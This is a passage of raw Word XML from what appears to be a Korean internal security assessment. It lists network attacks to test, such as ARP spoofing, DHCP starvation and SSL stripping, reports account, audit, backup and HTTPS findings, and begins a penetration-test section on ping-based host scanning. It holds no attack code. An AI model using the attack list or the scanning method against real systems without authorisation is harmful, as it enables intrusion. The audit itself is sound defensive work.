          <w:tcPr>
            <w:tcW w:w="3769" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006660AD" w:rsidRDefault="006660AD" w:rsidP="00721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검 대상</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00863AB2" w:rsidTr="006660A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</w:p>
          <w:p w:rsidR="00863AB2" w:rsidRDefault="00863AB2" w:rsidP="006660AD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>네트워크 보안</w:t>
            </w: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ARP Spoofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3769" w:type="dxa"/>
            <w:vMerge w:val="restart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 xml:space="preserve">각 부서 및 서버 네트워크 PC, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r>
              <w:t>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863AB2" w:rsidTr="006660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poofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3769" w:type="dxa"/>
            <w:vMerge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AB2" w:rsidTr="006660A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HCP Starvation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3769" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w:rsidR="00863AB2" w:rsidRDefault="00863AB2" w:rsidP="00721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863AB2" w:rsidTr="006660A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863AB2" w:rsidRDefault="00863AB2" w:rsidP="006660AD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00863AB2" w:rsidRDefault="00863AB2" w:rsidP="0066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DNS Spoofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3769" w:type="dxa"/>
            <w:vMerge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AD" w:rsidTr="006660A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ICMP redirection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H 취약점</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>SSH MITM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nux</w:t>
            </w:r>
            <w:r w:rsidRPr="00863AB2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> OS 서버(DNS서버, DHCP서버, 웹 서버, DB 서버)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006660AD" w:rsidTr="006660A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6660AD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AD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SSL 취약점</w:t>
            </w:r>
            <w:r w:rsidR="00863AB2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>(S</w:t>
            </w:r>
            <w:r w:rsidR="00863AB2">
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidRPr="006660AD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>L Strip Attack)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3769" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006660AD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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006660AD" w:rsidTr="006660A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SNMP 취약점</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3769" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00863AB2" w:rsidRPr="00863AB2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각 부서 및 서버 네트워크 PC,</w:t>
            </w:r>
          </w:p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Pr="00863AB2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R</w:t>
            </w:r>
            <w:r>
              <w:t>outer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006660AD" w:rsidTr="006660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6660AD" w:rsidRDefault="006660AD" w:rsidP="006660AD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006660AD" w:rsidRDefault="00863AB2" w:rsidP="0072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Sniffing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3769" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006660AD" w:rsidRDefault="00863AB2" w:rsidP="0086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B2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>VPN 네트워크</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00664540" w:rsidRDefault="00664540" w:rsidP="00863AB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00863AB2" w:rsidRP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863AB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>일정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00863AB2" w:rsidRPr="00863AB2" w:rsidRDefault="00863AB2" w:rsidP="00863AB2">
      <w:pPr>
        <w:ind w:left="760" w:firstLine="40"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00863AB2">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CF55AE5" wp14:editId="1B00541E">
            <wp:extent cx="5187658" cy="2092037"/>
            <wp:effectExtent l="0" t="0" r="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9" cy="21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Default="0063215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AB2" w:rsidRDefault="00863AB2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="00632150">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00632150">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">C </w:t>
      </w:r>
      <w:r w:rsidR="00632150">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>현황 점검</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00632150" w:rsidRPr="004F56F1" w:rsidRDefault="00632150" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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암호 정책 및 계정 잠금 정책)</w:t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FDAAC9" wp14:editId="748DC9EB">
            <wp:extent cx="2034540" cy="624840"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="7" name="그림 7" descr="https://lh6.googleusercontent.com/I7hapM_E5_x7j1vWZRfhrGhRDnqhZJoRBkTKPwplH_8wR0wlevKc5U87M6D437pXUitaRybJNLuUwQ8BFoiKBX9HhqHIyN2q68i-yFOU8L_UQE7n2V2JZCBOP_hRy-3SFOBVY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7hapM_E5_x7j1vWZRfhrGhRDnqhZJoRBkTKPwplH_8wR0wlevKc5U87M6D437pXUitaRybJNLuUwQ8BFoiKBX9HhqHIyN2q68i-yFOU8L_UQE7n2V2JZCBOP_hRy-3SFOBVYhe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2F9A99" wp14:editId="5A4AC33C">
            <wp:extent cx="2270760" cy="411480"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="8" name="그림 8" descr="https://lh4.googleusercontent.com/Hg6vLIepMSQFn5U_oh0fXB7s6WVjiA67on_aEuehjXGwE5ZWOWa-PrqMTAYctEJrQO0e89lWlDaXM8r54UimntdPn6d7o5TG_xT6I3OKOjeNG1kazZYGZc-rcjmSDbEUZBmB5R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g6vLIepMSQFn5U_oh0fXB7s6WVjiA67on_aEuehjXGwE5ZWOWa-PrqMTAYctEJrQO0e89lWlDaXM8r54UimntdPn6d7o5TG_xT6I3OKOjeNG1kazZYGZc-rcjmSDbEUZBmB5Rl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Default="00632150" w:rsidP="00632150">
      <w:pPr>
        <w:ind w:left="760"/>
        <w:rPr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CD85B1C" wp14:editId="332BF1F4">
            <wp:extent cx="1447800" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19" name="그림 19" descr="https://lh4.googleusercontent.com/XbFNQZ_b76P-_J2DAfulAMqb7dFZ_mW01yUYfXVN2dpfE6cdy2aWA1p3Btkno5CvU2B8QGlJ6vq5CDSu1xSc0tOifGcaC_w3dyFKHjLMG9F2hjq-SjO0heK7GPlaTGnk-pGMH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bFNQZ_b76P-_J2DAfulAMqb7dFZ_mW01yUYfXVN2dpfE6cdy2aWA1p3Btkno5CvU2B8QGlJ6vq5CDSu1xSc0tOifGcaC_w3dyFKHjLMG9F2hjq-SjO0heK7GPlaTGnk-pGMHK5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46567986" wp14:editId="7E80DF8B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>510540</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7620</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2606040" cy="1021080"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="17" name="그림 17" descr="https://lh4.googleusercontent.com/r7BD5MSKDSJwkOl0fhbrJFzFmtAomL5VTvJF3TW-dZ0xkrZ_SiU2ca6F0dMHFIJMdJ2cNQdiU3CGijSrFoUtOHT2DbXdHB-fTsnTOgTZwVCI7WI7Ca3tEiYaWT3E3KMcjWORmX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7BD5MSKDSJwkOl0fhbrJFzFmtAomL5VTvJF3TW-dZ0xkrZ_SiU2ca6F0dMHFIJMdJ2cNQdiU3CGijSrFoUtOHT2DbXdHB-fTsnTOgTZwVCI7WI7Ca3tEiYaWT3E3KMcjWORmX9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성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억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42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제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임계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 xml:space="preserve">CentOS </w:t>
      </w:r>
      <w:r w:rsidRPr="00632150">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서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/etc/pam.d/system-auth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복잡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재시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가능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횟수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기본값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만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고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7</w:t>
      </w:r>
      <w:r w:rsidRPr="00632150">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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암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최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길이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5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/etc/default/useradd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결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INACTIVE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값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-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00632150">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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잠금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되어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있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계정 정책 </w:t>
      </w:r>
      <w:r w:rsidRPr="004F56F1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004F56F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>계정 설정</w:t>
      </w:r>
      <w:r w:rsidRPr="004F56F1">
        <w:rPr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609E93F" wp14:editId="4545B941">
            <wp:extent cx="2438400" cy="1135380"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="20" name="그림 20" descr="https://lh6.googleusercontent.com/awAcytYQNoT0R8ekGYMduPnCus7yGL3l-Hw-W8rIduOq9qpkLUMZzGLxatGkE8hDzqaW5118APTU_-5jZs4fZU736DOXqNRK4eUSrtpxHVB-PKtUafLOiZ93Zium-ilKygscYW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awAcytYQNoT0R8ekGYMduPnCus7yGL3l-Hw-W8rIduOq9qpkLUMZzGLxatGkE8hDzqaW5118APTU_-5jZs4fZU736DOXqNRK4eUSrtpxHVB-PKtUafLOiZ93Zium-ilKygscYW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46A76D2" wp14:editId="435D3E4A">
            <wp:extent cx="2202180" cy="1905000"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="21" name="그림 21" descr="https://lh6.googleusercontent.com/n6AbGRr0IC773o7Mvcx-e9Yx8QUo5SrePfiFpt3Nxn5E8pKHF6VXkOxMj9oOYqPXpIdRn0yo_v2eHN1MvdliTIsvt1-VvDgSCpGLEmWp0hU1lNgeswF6VjdFDVGHf2Iarl2uI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n6AbGRr0IC773o7Mvcx-e9Yx8QUo5SrePfiFpt3Nxn5E8pKHF6VXkOxMj9oOYqPXpIdRn0yo_v2eHN1MvdliTIsvt1-VvDgSCpGLEmWp0hU1lNgeswF6VjdFDVGHf2Iarl2uI2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윈도우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서버는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관리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및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Guest </w:t>
      </w:r>
      <w:r w:rsidRPr="00632150">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>계정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그대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Guest </w:t>
      </w:r>
      <w:r w:rsidRPr="00632150">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>계정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안</w:t>
      </w:r>
      <w:r w:rsidRPr="006321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함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상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/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>원격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접속에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필요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별도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계정을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사용하지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않음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00632150" w:rsidRPr="00CE3782" w:rsidRDefault="00632150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E3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CentOS </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/passwd </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파일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확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결과</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>계정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이외에</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> user1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>계정만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존재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사용자에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따른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구분이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보이지</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>않음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ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/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정책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/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(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개체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액세스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및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이벤트</w:t>
      </w:r>
      <w:r w:rsidRPr="004F56F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감사</w:t>
      </w:r>
      <w:r w:rsidRPr="004F56F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)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E464E63" wp14:editId="6A3A3575">
            <wp:extent cx="2339340" cy="1760220"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="23" name="그림 23" descr="https://lh5.googleusercontent.com/SJKVfxx8wI1GqqWDblwTd6BaaEM_x65pmY-rO2ddJT8ujgB1PsTscuSDwremBNCE1KF7cGJJas01Zrxd7wgyvHPGzhXIITgmQQdGi3ehA5ef-Z7_qsRYPliAMCRkkl9nQa5QY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SJKVfxx8wI1GqqWDblwTd6BaaEM_x65pmY-rO2ddJT8ujgB1PsTscuSDwremBNCE1KF7cGJJas01Zrxd7wgyvHPGzhXIITgmQQdGi3ehA5ef-Z7_qsRYPliAMCRkkl9nQa5QYoL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E7FF379" wp14:editId="1DAC4CC4">
            <wp:extent cx="2575560" cy="1729740"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="24" name="그림 24" descr="https://lh4.googleusercontent.com/cfcOCFIEl78VJXhiWNO5QPR6uLHwQljBvcaJlAlS01Cn3NdM3DHICTpfYI-JbVYihdwApzJDkTUaQ_OMld8MSMP04qE025bCmO2IGpo6g_WAhPviiuMpnAk5xdxoSxHbfNwNUF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cfcOCFIEl78VJXhiWNO5QPR6uLHwQljBvcaJlAlS01Cn3NdM3DHICTpfYI-JbVYihdwApzJDkTUaQ_OMld8MSMP04qE025bCmO2IGpo6g_WAhPviiuMpnAk5xdxoSxHbfNwNUFw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50" w:rsidRPr="00632150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현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감사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정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2150">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00632150">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inux</w:t>
      </w:r>
      <w:r w:rsidRPr="00632150">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의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로그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파일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경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확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00632150" w:rsidRPr="004F56F1" w:rsidRDefault="00632150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>백업 일정 설정 및 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00632150" w:rsidRDefault="00632150" w:rsidP="00632150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5FE2169" wp14:editId="01547338">
            <wp:extent cx="2286000" cy="1370965"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="26" name="그림 2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4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3" cy="1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F8300C" wp14:editId="42583A17">
            <wp:extent cx="2407920" cy="946521"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="28" name="그림 2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4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6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50" w:rsidRPr="00E970E7" w:rsidRDefault="00632150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632150">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>설정된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백업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일정</w:t>
      </w:r>
      <w:r w:rsidRPr="006321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150">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>없음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E970E7" w:rsidRPr="004F56F1" w:rsidRDefault="00E970E7" w:rsidP="00CD0B2D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 w:rsidRPr="004F56F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">웹 서버 </w:t>
      </w:r>
      <w:r w:rsidRPr="004F56F1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SSL </w:t>
      </w:r>
      <w:r w:rsidRPr="004F56F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>설정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E970E7" w:rsidRDefault="00E970E7" w:rsidP="00E970E7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67F9714" wp14:editId="47D3B7DA">
            <wp:extent cx="2369820" cy="586740"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="29" name="그림 29" descr="https://lh5.googleusercontent.com/UCz5heXs74pSstoDy-eeCC5gNcDI5FMo9J8TuqorFjEmFCZGBBCezTf5lhYxjrANm1y-t6qS2mVErkzNGiITl1NC5FglLyW3OYhpd3rK17-RZtgszvf9FVVwF6tHErSqIemLS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UCz5heXs74pSstoDy-eeCC5gNcDI5FMo9J8TuqorFjEmFCZGBBCezTf5lhYxjrANm1y-t6qS2mVErkzNGiITl1NC5FglLyW3OYhpd3rK17-RZtgszvf9FVVwF6tHErSqIemLSqMz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D2D8243" wp14:editId="55EB4657">
            <wp:extent cx="2438400" cy="1379220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30" name="그림 30" descr="https://lh5.googleusercontent.com/eEA9y8qdxaYrg5ovbWBqNjzJWhraOCGfSYK4pW4bGI1WSyh1g4ehaKEd-O77nZylRPLmqtnx99yT97nG5UtY7lyelT8FUx4I_a0QhPoGGDcHCCtbZqrR83KuAz8J-RChHti7T8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eEA9y8qdxaYrg5ovbWBqNjzJWhraOCGfSYK4pW4bGI1WSyh1g4ehaKEd-O77nZylRPLmqtnx99yT97nG5UtY7lyelT8FUx4I_a0QhPoGGDcHCCtbZqrR83KuAz8J-RChHti7T8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E7" w:rsidRPr="00E970E7" w:rsidRDefault="00E970E7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E970E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>웹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서버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https </w:t>
      </w:r>
      <w:r w:rsidRPr="00E970E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>접속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설정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>확인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및</w:t>
      </w:r>
      <w:r w:rsidRPr="00E970E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E970E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">http-&gt;https Redirect </w:t>
      </w:r>
      <w:r w:rsidRPr="00E970E7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E970E7" w:rsidRDefault="00E970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2150" w:rsidRDefault="00632150" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00632150">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 모의해킹 실시</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034182E" w:rsidRP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t>시스템 보안</w:t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34182E">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Host Scanning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H</w:t>
      </w:r>
      <w:r w:rsidRPr="002E005F">
        <w:t>ost Scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="002E005F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이란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 w:rsidRPr="002E005F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="002E005F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>canning</w:t>
      </w:r>
      <w:r w:rsidRPr="002E005F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>기법 중 가장 기본적인 방법</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>으로</w:t>
      </w:r>
      <w:r w:rsidRPr="002E005F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ICMP</w:t>
      </w:r>
      <w:r w:rsidRPr="002E005F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">프로토콜을 사용하고 </w:t>
      </w:r>
      <w:r w:rsidRPr="002E005F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ping</w:t>
      </w:r>
      <w:r w:rsidRPr="002E005F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 보내 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>확인</w:t>
      </w:r>
      <w:r w:rsidR="00DF439F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>하는 공격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피해 범위</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E005F" w:rsidRDefault="002E005F" w:rsidP="002E005F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접근 가능한 대역대에서 동작중인 시스템의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 확인 가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E005F" w:rsidRPr="002E005F" w:rsidRDefault="002E005F" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002E005F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A0EF6E" wp14:editId="5E0E33F6">
            <wp:extent cx="2407920" cy="1615440"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
